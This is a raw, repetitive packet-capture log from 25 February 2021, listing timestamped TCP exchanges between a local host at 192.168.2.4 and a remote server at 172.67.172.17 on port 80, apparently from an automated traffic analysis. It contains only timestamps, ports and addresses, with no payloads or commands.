                                                                                                              Feb 25, 2021 15:10:41.273542881 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.273570061 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.273596048 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.273624897 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.273652077 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.274348974 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.274374008 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.274400949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.274439096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.275201082 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.275226116 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.275268078 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.275266886 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.275316954 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.276006937 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.276031017 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.276055098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.276087999 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.276915073 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.276940107 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.276964903 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.276992083 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.277038097 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.277626991 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.277657032 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.277681112 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.277797937 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.278423071 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.278450012 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.278474092 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.278513908 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.278537989 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.279201031 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.279225111 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.279251099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.279268980 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.279956102 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.279980898 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.280008078 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.280013084 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.280097961 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.280128002 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.280729055 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.280752897 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.280776978 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.280807018 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.281486034 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.281511068 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.281533003 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.281543016 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.281590939 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.282241106 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.282265902 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.282291889 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.282313108 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.283009052 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.283030987 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.283054113 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.283060074 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.283113003 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.283766031 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.283792019 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.283814907 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.283844948 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.284477949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.284506083 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.284531116 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.284554005 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.284559965 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.284590006 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.285470009 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.285495043 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.285517931 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.285552979 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.285557985 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.285690069 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.286415100 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.286439896 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.286463022 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.286487103 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.286510944 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.286613941 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.287415028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287444115 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287463903 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287487984 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.287519932 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.288367987 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288399935 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288424015 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288445950 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.288482904 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.288526058 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.289315939 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289345026 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289370060 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289406061 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.289418936 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.289448023 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.290272951 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290297985 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290326118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290349007 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.290375948 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.290424109 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.291250944 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291277885 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291302919 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291327000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.291359901 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.291409969 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292174101 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292205095 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292227030 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292241096 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292244911 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292304039 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292880058 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292907000 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292933941 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292947054 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.292960882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292988062 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.292988062 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.293040037 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.293736935 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293761969 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293787003 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293811083 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.293893099 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.294433117 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294465065 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294488907 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294517040 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294531107 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.294543028 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.294583082 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.295336962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295362949 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295387030 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295391083 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.295412064 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295437098 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.295442104 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.295506954 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.296192884 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296220064 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296242952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296267033 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296277046 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.296292067 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.296307087 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297058105 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297087908 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297113895 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297115088 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297138929 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297163963 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297168016 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297214031 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.297930956 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297959089 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.297985077 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298008919 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298033953 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298044920 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.298054934 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.298865080 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298891068 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298918962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298926115 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.298945904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298970938 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.298995972 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.299036980 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.299753904 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299779892 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299803019 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299827099 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299841881 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.299850941 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.299871922 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.300573111 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.300597906 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.300621986 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.300646067 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.300673962 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.300704002 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.300721884 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.300724030 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.301512003 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.301542044 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.301564932 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.301587105 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.301609039 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.301610947 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.301630020 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.302329063 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.302359104 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.302381992 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.302401066 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.302407026 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.302421093 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.302437067 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.302473068 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.303183079 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.303214073 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.303237915 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.303258896 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.303276062 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.303282022 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.303306103 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.304092884 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.304124117 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.304146051 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.304152966 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.304167986 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.304191113 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.304209948 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.304250002 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.305126905 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.305155039 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.305180073 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.305211067 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.306984901 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307012081 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307039022 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307065010 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307077885 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.307090998 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307110071 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.307145119 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.307435036 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307461023 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307488918 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307513952 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307537079 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.307542086 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.307564974 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.308300018 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.308366060 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.308377028 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.308392048 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.308417082 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.308442116 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.308443069 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.308495998 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.309192896 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.309220076 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.309259892 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.309288025 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.309288025 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.309341908 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.309403896 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.310038090 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.310065031 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.310089111 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.310117006 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.310131073 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.310143948 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.310149908 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.310194969 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.310962915 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.310988903 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311012983 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311038017 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311053038 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.311063051 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311091900 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.311745882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311774015 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311799049 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311826944 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311840057 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.311851978 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.311875105 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.311903954 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.312630892 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.312657118 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.312680960 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.312726021 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.312748909 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.312761068 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.313040018 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.313457012 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.313482046 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.313509941 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.313517094 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.313536882 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.313555002 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.313560963 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.313612938 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.314279079 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314306021 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314335108 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314390898 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.314774036 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314800024 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314825058 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314827919 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.314848900 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314872980 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.314873934 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.314927101 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.315711975 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.315737963 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.315762043 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.315785885 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.315784931 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.315812111 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.315829992 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.316488981 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.316515923 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.316540003 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.316554070 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.316567898 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.316579103 CET4973180192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:41.316596031 CET8049731172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:41.316649914 CET4973180192.168.2.4172.67.172.17
